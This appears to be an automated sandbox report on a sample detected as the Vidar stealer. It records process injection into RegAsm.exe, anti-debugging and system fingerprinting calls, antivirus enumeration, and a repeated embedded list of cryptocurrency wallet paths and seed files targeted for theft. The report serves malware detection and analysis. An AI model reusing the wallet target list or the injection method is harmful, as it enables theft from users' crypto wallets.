Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00273DBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00273DBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041AA5F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0041AA5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041FB38 SetUnhandledExceptionFilter,	1_2_0041FB38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041BF87 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0041BF87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C252C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_1C252C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2542AF SetUnhandledExceptionFilter,	1_2_1C2542AF

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00411C50 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00411C50

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 644000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1049008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_002FB418 cpuid

0_2_002FB418

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoEx,FormatMessageA,	0_2_0024CB3F
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_002C1573
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_002C1762
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_002C22BD
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoEx,	0_2_002725C2
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_002CEE7B
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_002CEEFD
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_002CEFBE
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_002CF06B
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_002CF352
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_002CF4C5
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_002CF60C
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_002CF70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_004103D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,LocalFree,	1_2_00410449
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	1_2_1C252112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	1_2_1C252112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_1C42FF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_1C253AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_1C443300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_1C442CB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_1C442D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_1C442DF9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_002C230B GetSystemTimeAsFileTime,

0_2_002C230B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00410280 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_00410280

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00410360 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_00410360

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: RegAsm.exe, 00000001.00000002.2794775836.0000000001627000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: RegAsm.exe, 00000001.00000002.2794775836.0000000001627000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: er\MsMpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4904, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia 